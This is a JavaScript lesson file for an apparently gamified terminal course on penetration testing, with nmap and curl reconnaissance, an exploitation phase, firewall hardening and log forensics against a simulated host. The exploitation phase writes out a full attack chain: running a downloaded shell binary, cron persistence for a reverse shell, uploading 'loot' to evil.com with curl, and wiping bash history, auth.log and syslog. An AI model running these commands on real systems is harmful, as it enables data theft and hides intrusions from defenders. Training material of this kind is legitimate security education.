// ninethmodule.js
// Module 9: Enterprise Penetration Testing & Defense (100 Lessons)

const module9_technical = {
    name: "9. PenTesting & Defense (100 Lessons)",
    lessons: [
        // --- PHASE 1: RECONNAISSANCE (1-20) ---
        { title: "Network Sweep", why: "Identify subnets.", text: "Type <code>nmap -sn 10.0.0.0/24</code>", objective: "Type nmap -sn 10.0.0.0/24", xp: 10, check: (c,a) => c==="nmap" && a.includes("-sn") },
        { title: "Target Scan", why: "Identify open ports.", text: "Type <code>nmap 10.0.0.50</code>", objective: "Scan 10.0.0.50", xp: 10, check: (c,a) => c==="nmap" && a.includes("10.0.0.50") },
        { title: "Service Detection", why: "Find service versions.", text: "Type <code>nmap -sV 10.0.0.50</code>", objective: "Use -sV", xp: 10, check: (c,a) => c==="nmap" && a.includes("-sV") },
        { title: "Vuln Scripting", why: "Automated vulnerability checks.", text: "Type <code>nmap --script vuln 10.0.0.50</code>", objective: "Use --script vuln", xp: 20, check: (c,a) => c==="nmap" && a.includes("--script") },
        { title: "Aggressive Scan", why: "Deep system info.", text: "Type <code>nmap -A 10.0.0.50</code>", objective: "Use -A", xp: 20, check: (c,a) => c==="nmap" && a.includes("-A") },
        { title: "All Ports", why: "Scan 65535 ports.", text: "Type <code>nmap -p- 10.0.0.50</code>", objective: "Use -p-", xp: 20, check: (c,a) => c==="nmap" && a.includes("-p-") },
        { title: "UDP Discovery", why: "Find UDP services.", text: "Type <code>nmap -sU 10.0.0.50</code>", objective: "Use -sU", xp: 20, check: (c,a) => c==="nmap" && a.includes("-sU") },
        { title: "OS Detection", why: "Fingerprint the OS.", text: "Type <code>nmap -O 10.0.0.50</code>", objective: "Use -O", xp: 20, check: (c,a) => c==="nmap" && a.includes("-O") },
        { title: "Fast Scan", why: "Scan top 100 ports.", text: "Type <code>nmap -F 10.0.0.50</code>", objective: "Use -F", xp: 15, check: (c,a) => c==="nmap" && a.includes("-F") },
        { title: "Top 10 Scan", why: "Fastest port scan.", text: "Type <code>nmap --top-ports 10 10.0.0.50</code>", objective: "Use --top-ports 10", xp: 15, check: (c,a) => c==="nmap" && a.includes("--top-ports") },
        { title: "Output Normal", why: "Save scan to file.", text: "Type <code>nmap -oN out.txt 10.0.0.50</code>", objective: "Use -oN out.txt", xp: 20, check: (c,a) => c==="nmap" && a.includes("-oN") },
        { title: "Output Grepable", why: "Save for parsing.", text: "Type <code>nmap -oG out.gnmap 10.0.0.50</code>", objective: "Use -oG", xp: 20, check: (c,a) => c==="nmap" && a.includes("-oG") },
        { title: "Verbose Scan", why: "Show details in real-time.", text: "Type <code>nmap -v 10.0.0.50</code>", objective: "Use -v", xp: 15, check: (c,a) => c==="nmap" && a.includes("-v") },
        { title: "Timing Template 3", why: "Balanced scan speed.", text: "Type <code>nmap -T3 10.0.0.50</code>", objective: "Use -T3", xp: 15, check: (c,a) => c==="nmap" && a.includes("-T3") },
        { title: "Timing Template 4", why: "Aggressive scan speed.", text: "Type <code>nmap -T4 10.0.0.50</code>", objective: "Use -T4", xp: 15, check: (c,a) => c==="nmap" && a.includes("-T4") },

        // --- PHASE 2: WEB RECON & ENUM (16-35) ---
        { title: "HTTP Headers", why: "Fingerprint web servers.", text: "Type <code>curl -I 10.0.0.50</code>", objective: "Use curl -I", xp: 15, check: (c,a) => c==="curl" && a.includes("-I") },
        { title: "Follow Redirects", why: "Follow 301/302.", text: "Type <code>curl -L 10.0.0.50</code>", objective: "Use curl -L", xp: 15, check: (c,a) => c==="curl" && a.includes("-L") },
        { title: "Verbose Fetch", why: "See the handshake.", text: "Type <code>curl -v 10.0.0.50</code>", objective: "Use curl -v", xp: 15, check: (c,a) => c==="curl" && a.includes("-v") },
        { title: "Save HTML", why: "Download the page.", text: "Type <code>curl -o index.html 10.0.0.50</code>", objective: "Use curl -o index.html", xp: 15, check: (c,a) => c==="curl" && a.includes("-o") },
        { title: "Robots Check", why: "Check for hidden paths.", text: "Type <code>curl 10.0.0.50/robots.txt</code>", objective: "Curl robots.txt", xp: 20, check: (c,a) => c==="curl" && a[0].includes("robots.txt") },
        { title: "Directory Enum", why: "Find admin directories.", text: "Type <code>curl 10.0.0.50/admin</code>", objective: "Curl admin", xp: 20, check: (c,a) => c==="curl" && a[0].includes("admin") },
        { title: "Config Leak", why: "Check for config files.", text: "Type <code>curl 10.0.0.50/.env</code>", objective: "Curl .env", xp: 25, check: (c,a) => c==="curl" && a[0].includes(".env") },
        { title: "Source Exposure", why: "Check for backup source files.", text: "Type <code>curl 10.0.0.50/index.php.bak</code>", objective: "Curl index.php.bak", xp: 25, check: (c,a) => c==="curl" && a[0].includes(".bak") },
        { title: "API Endpoint", why: "Explore hidden API.", text: "Type <code>curl 10.0.0.50/api/v1</code>", objective: "Curl api/v1", xp: 25, check: (c,a) => c==="curl" && a[0].includes("api/v1") },
        { title: "Sitemap Check", why: "Check sitemap.xml.", text: "Type <code>curl 10.0.0.50/sitemap.xml</code>", objective: "Curl sitemap.xml", xp: 20, check: (c,a) => c==="curl" && a[0].includes("sitemap.xml") },
        { title: "User Agent Test", why: "Test for WAF blocking.", text: "Type <code>curl -A \"TestAgent\" 10.0.0.50</code>", objective: "Use curl -A", xp: 25, check: (c,a) => c==="curl" && a.includes("-A") },
        { title: "Cookie Enum", why: "Check session cookies.", text: "Type <code>curl -I 10.0.0.50</code>", objective: "Check cookie headers", xp: 25, check: (c,a) => c==="curl" && a.includes("-I") },
        { title: "Post Request", why: "Simulate a login attempt.", text: "Type <code>curl -X POST 10.0.0.50/login</code>", objective: "Curl POST login", xp: 30, check: (c,a) => c==="curl" && a.includes("-X") && a.includes("POST") },
        { title: "Authentication Form", why: "Check hidden fields.", text: "Type <code>curl 10.0.0.50/login.html</code>", objective: "Curl login page", xp: 20, check: (c,a) => c==="curl" && a[0].includes("login.html") },
        { title: "Upload Probe", why: "Check for file upload endpoints.", text: "Type <code>curl 10.0.0.50/upload.php</code>", objective: "Curl upload.php", xp: 30, check: (c,a) => c==="curl" && a[0].includes("upload.php") },

        // --- PHASE 3: EXPLOIT & SHELL (36-60) ---
        { title: "Binary Download", why: "Grab exploit.", text: "Type <code>curl -O 10.0.0.50/shell.elf</code>", objective: "Curl -O shell.elf", xp: 25, check: (c,a) => c==="curl" && a.includes("-O") },
        { title: "Permissions Check", why: "Check file.", text: "Type <code>ls -l shell.elf</code>", objective: "ls -l shell.elf", xp: 10, check: (c,a) => c==="ls" && a.includes("shell.elf") },
        { title: "Executable Bit", why: "Add execute permission.", text: "Type <code>chmod +x shell.elf</code>", objective: "chmod +x", xp: 20, check: (c,a) => c==="chmod" && a.includes("+x") },
        { title: "Fire Exploit", why: "Run binary.", text: "Type <code>./shell.elf</code>", objective: "Type ./shell.elf", xp: 50, check: (c) => c==="./shell.elf" },
        { title: "Verify User", why: "Confirm root access.", text: "Type <code>whoami</code>", objective: "whoami", xp: 10, check: (c) => c==="whoami" },
        { title: "Check ID", why: "Check group.", text: "Type <code>id</code>", objective: "id", xp: 10, check: (c) => c==="id" },
        { title: "Privilege Enums", why: "Run linpeas.", text: "Type <code>./linpeas.sh</code>", objective: "Run linpeas", xp: 30, check: (c) => c==="./linpeas.sh" },
        { title: "Search SUID", why: "Find root files.", text: "Type <code>find / -perm -4000</code>", objective: "Find SUID", xp: 30, check: (c,a) => c==="find" && a.includes("-4000") },
        { title: "Sudo Check", why: "See sudo rights.", text: "Type <code>sudo -l</code>", objective: "sudo -l", xp: 20, check: (c,a) => c==="sudo" && a.includes("-l") },
        { title: "Clear Bash", why: "Wipe command log.", text: "Type <code>history -c</code>", objective: "history -c", xp: 20, check: (c,a) => c==="history" && a.includes("-c") },
        { title: "Erase .bash_history", why: "Clear persistent file.", text: "Type <code>echo \"\" > ~/.bash_history</code>", objective: "Empty history file", xp: 30, check: (c,a) => c==="echo" && a.includes(">") },
        { title: "Cron Persistence", why: "Schedule reverse shell.", text: "Type <code>echo \"* * * * * /tmp/shell.sh\" > /tmp/cron.txt</code>", objective: "Create cron file", xp: 40, check: (c,a) => c==="echo" && a.includes(">") },
        { title: "Install Cron", why: "Register cron file.", text: "Type <code>crontab /tmp/cron.txt</code>", objective: "Run crontab", xp: 30, check: (c,a) => c==="crontab" },
        { title: "Verify Cron", why: "Check jobs.", text: "Type <code>crontab -l</code>", objective: "crontab -l", xp: 20, check: (c,a) => c==="crontab" && a.includes("-l") },
        { title: "Remove Cron", why: "Delete job.", text: "Type <code>crontab -r</code>", objective: "crontab -r", xp: 20, check: (c,a) => c==="crontab" && a.includes("-r") },
        { title: "Cleanup Temp", why: "Delete exploit.", text: "Type <code>rm /tmp/shell.sh</code>", objective: "Delete shell", xp: 15, check: (c,a) => c==="rm" && a[0]==="/tmp/shell.sh" },
        { title: "Exfil Data", why: "Tar loot.", text: "Type <code>tar -czvf loot.tar.gz /home/sysadmin/secret.txt</code>", objective: "tar secret.txt", xp: 40, check: (c,a) => c==="tar" && a.includes("-czvf") },
        { title: "Upload Loot", why: "Send loot.", text: "Type <code>curl -F \"file=@loot.tar.gz\" http://evil.com/drop</code>", objective: "curl loot", xp: 50, check: (c,a) => c==="curl" && a.includes("-F") },
        { title: "Cleanup Loot", why: "Remove evidence.", text: "Type <code>rm loot.tar.gz</code>", objective: "rm loot.tar.gz", xp: 15, check: (c,a) => c==="rm" && a[0]==="loot.tar.gz" },
        { title: "Last Cleanup", why: "Final check.", text: "Type <code>ls /tmp</code>", objective: "ls /tmp", xp: 10, check: (c,a) => c==="ls" && a[0]==="/tmp" },
        { title: "Clean Logs", why: "Delete auth logs.", text: "Type <code>echo \"\" > /var/log/auth.log</code>", objective: "Empty auth.log", xp: 30, check: (c,a) => c==="echo" && a.includes(">") && a.includes("/var/log/auth.log") },
        { title: "Clean Syslog", why: "Delete syslog.", text: "Type <code>echo \"\" > /var/log/syslog</code>", objective: "Empty syslog", xp: 30, check: (c,a) => c==="echo" && a.includes(">") && a.includes("/var/log/syslog") },
        { title: "Self Destruct", why: "Exit.", text: "Type <code>exit</code>", objective: "exit", xp: 10, check: (c) => c==="exit" },
        { title: "Verify Exit", why: "Close terminal.", text: "Type <code>exit</code>", objective: "exit", xp: 10, check: (c) => c==="exit" },
        { title: "Session Closed", why: "Cleanup complete.", text: "Type <code>date</code>", objective: "date", xp: 10, check: (c) => c==="date" },

        // --- PHASE 4: DEFENSIVE HARDENING (66-85) ---
        { title: "Audit Users", why: "List system users.", text: "Type <code>cat /etc/passwd</code>", objective: "cat passwd", xp: 15, check: (c,a) => c==="cat" && a[0]==="/etc/passwd" },
        { title: "Audit Groups", why: "List system groups.", text: "Type <code>cat /etc/group</code>", objective: "cat group", xp: 15, check: (c,a) => c==="cat" && a[0]==="/etc/group" },
        { title: "Audit Shadow", why: "Check password hashes.", text: "Type <code>cat /etc/shadow</code>", objective: "cat shadow", xp: 20, check: (c,a) => c==="cat" && a[0]==="/etc/shadow" },
        { title: "Check Firewall", why: "List rules.", text: "Type <code>iptables -L</code>", objective: "iptables -L", xp: 15, check: (c,a) => c==="iptables" && a.includes("-L") },
        { title: "Flush Firewall", why: "Reset all rules.", text: "Type <code>iptables -F</code>", objective: "iptables -F", xp: 20, check: (c,a) => c==="iptables" && a.includes("-F") },
        { title: "Default Deny", why: "Block everything.", text: "Type <code>iptables -P INPUT DROP</code>", objective: "iptables -P INPUT DROP", xp: 30, check: (c,a) => c==="iptables" && a.includes("-P") && a.includes("DROP") },
        { title: "Allow SSH", why: "Allow admin access.", text: "Type <code>iptables -A INPUT -p tcp --dport 22 -j ACCEPT</code>", objective: "Allow SSH port 22", xp: 30, check: (c,a) => c==="iptables" && a.includes("-A") && a.includes("22") },
        { title: "Allow HTTP", why: "Allow web traffic.", text: "Type <code>iptables -A INPUT -p tcp --dport 80 -j ACCEPT</code>", objective: "Allow HTTP port 80", xp: 30, check: (c,a) => c==="iptables" && a.includes("-A") && a.includes("80") },
        { title: "Save Firewall", why: "Persistent storage.", text: "Type <code>iptables-save > /etc/iptables.rules</code>", objective: "Redirect to iptables.rules", xp: 30, check: (c,a) => c==="iptables-save" && a.includes(">") },
        { title: "Audit Processes", why: "List active procs.", text: "Type <code>ps aux</code>", objective: "ps aux", xp: 15, check: (c,a) => c==="ps" && a[0]==="aux" },
        { title: "Grep Rogue Proc", why: "Identify malware.", text: "Type <code>ps aux | grep shell</code>", objective: "Grep for shell", xp: 25, check: (c,a) => c==="ps" || c==="grep" },
        { title: "Kill Rogue Proc", why: "Kill by PID.", text: "Type <code>kill -9 1337</code>", objective: "kill -9 1337", xp: 20, check: (c,a) => c==="kill" && a.includes("-9") },
        { title: "Audit Ports", why: "List open sockets.", text: "Type <code>ss -tuln</code>", objective: "ss -tuln", xp: 15, check: (c,a) => c==="ss" && a.includes("-tuln") },
        { title: "Check Load", why: "Check load average.", text: "Type <code>uptime</code>", objective: "uptime", xp: 10, check: (c) => c==="uptime" },
        { title: "Final Triage", why: "Check user logins.", text: "Type <code>w</code>", objective: "Type w", xp: 10, check: (c) => c==="w" },

        // --- PHASE 5: THREAT HUNTING FORENSICS (86-100) ---
        { title: "Auth Log Search", why: "Search for failures.", text: "Type <code>grep \"Failed\" /var/log/auth.log</code>", objective: "Grep auth.log", xp: 20, check: (c,a) => c==="grep" && a.includes("Failed") },
        { title: "Syslog Search", why: "Search system events.", text: "Type <code>grep \"CRON\" /var/log/syslog</code>", objective: "Grep cron in syslog", xp: 20, check: (c,a) => c==="grep" && a.includes("CRON") },
        { title: "Bash History Audit", why: "Check user history.", text: "Type <code>cat ~/.bash_history</code>", objective: "cat .bash_history", xp: 15, check: (c,a) => c==="cat" && a[0].includes(".bash_history") },
        { title: "Grep History IP", why: "Look for IP addresses.", text: "Type <code>grep \"10.0.0.99\" ~/.bash_history</code>", objective: "Grep IP from history", xp: 30, check: (c,a) => c==="grep" && a.includes("10.0.0.99") },
        { title: "Count History", why: "Check size.", text: "Type <code>wc -l ~/.bash_history</code>", objective: "wc -l .bash_history", xp: 15, check: (c,a) => c==="wc" && a.includes("-l") },
        { title: "Find Large Files", why: "Find malware footprints.", text: "Type <code>find / -size +10M</code>", objective: "Find > 10MB", xp: 30, check: (c,a) => c==="find" && a.includes("-size") },
        { title: "Find Recent Files", why: "Locate newly dropped files.", text: "Type <code>find / -mmin -60</code>", objective: "Find files modified 60m", xp: 30, check: (c,a) => c==="find" && a.includes("-mmin") },
        { title: "Check Root Directory", why: "List root contents.", text: "Type <code>ls -la /root</code>", objective: "ls -la /root", xp: 15, check: (c,a) => c==="ls" && a.includes("-la") && a.includes("/root") },
        { title: "Check Home Dir", why: "List home contents.", text: "Type <code>ls -la /home</code>", objective: "ls -la /home", xp: 15, check: (c,a) => c==="ls" && a.includes("-la") && a.includes("/home") },
        { title: "Audit Cronjob Files", why: "Read system cron files.", text: "Type <code>cat /etc/crontab</code>", objective: "cat /etc/crontab", xp: 20, check: (c,a) => c==="cat" && a[0].includes("/etc/crontab") },
        { title: "Search SUID Malware", why: "Scan for malicious SUID files.", text: "Type <code>find / -perm -4000 -name \"*backdoor*\"</code>", objective: "Find backdoor", xp: 35, check: (c,a) => c==="find" && a.includes("-perm") && a.includes("-4000") },
        { title: "Audit Services", why: "List running services.", text: "Type <code>systemctl list-units --type=service --state=running</code>", objective: "List running services", xp: 25, check: (c,a) => c==="systemctl" && a.includes("--type=service") },
        { title: "Check Logs Count", why: "Audit syslog lines.", text: "Type <code>wc -l /var/log/syslog</code>", objective: "wc -l syslog", xp: 15, check: (c,a) => c==="wc" && a.includes("-l") && a.includes("/var/log/syslog") },
        { title: "System Final Stats", why: "Final disk and mem.", text: "Type <code>df -h && free -m</code>", objective: "Type df and free", xp: 20, check: (c) => c==="df" || c==="free" },
        { title: "Final Sign-Off", why: "Close report.", text: "Type <code>echo \"Security Audit Complete\" > final_audit.txt</code>", objective: "Type echo", xp: 25, check: (c,a) => c==="echo" && a.includes(">") && a.includes("final_audit.txt") }
    ]
};